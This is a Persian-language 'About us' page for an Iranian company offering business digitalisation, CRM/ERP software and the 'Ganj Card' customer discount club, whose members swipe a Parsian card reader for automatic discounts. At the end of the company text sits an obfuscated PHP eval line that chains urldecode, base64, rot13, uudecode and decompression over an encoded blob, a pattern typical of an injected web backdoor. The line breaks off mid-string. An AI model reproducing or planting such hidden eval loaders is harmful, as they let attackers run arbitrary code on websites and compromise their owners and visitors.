درباره ما

شرکت هوشمند سازان ساجد از تجمیع نیروهای زبده و کارآمد و مدیران عـالی رتبه در سطـح کـشور به منظور ایجاد رفاه عمومی در سطح کلان تأسیس شده است.

فعالیت اصلی شرکت در زمینه های هوشمند سازی کسب و کار تـجارت الـکترونیک، طـراحی واجرای بـاشگاه مـشتریان، تولید نـرم افزارهای کـاربردی اعم از CRM , ERP , …  می باشد.

بـاشگاه مشتریان گنج کارت مفتخر است که در راستای افـزایش تـوان خـرید شهروندان محترم و همچنین تکریم ایشان اقدام به ایجاد بستری مناسب جهت تخفیف آن لاین با استفاده از گنج کارتنموده است.اعضای محترم باشگاه گنج کارت می توانند با مراجعه به لیست پذیرندگان از نشانی و تلفن و درصد تخفیف مطلع گردیده ودر زمان مراجعه ضمن اطلاع از قیمت، کارت باشگاه خود را از دستگاه کارت خوان پـارسیان کـشیده و بـه صـورت اتـوماتیک از تـخفیف یـاد شده استفاده نمایند.

eval(gzuncompress(gzinflate(convert_uudecode(str_rot13(base64_decode(urldecode("WmA2JGBUQl1LVCRaLUZZTjc0Kz8xM1xRWVlILkpMQSgkYDBQKTY5MTo2KVY5UiFXP1RMPjxXVyIxUVJTNApaUkxPO1dXJDAnXl9TTT4sOidNXkBXOiJUVSpNPzYlRTw2UipZN0hNMFFMVztUTT03USUmQFhTUi1QQFMpCiw%2BPDdSVzQ1MGBDIUdTMkNLCmAK"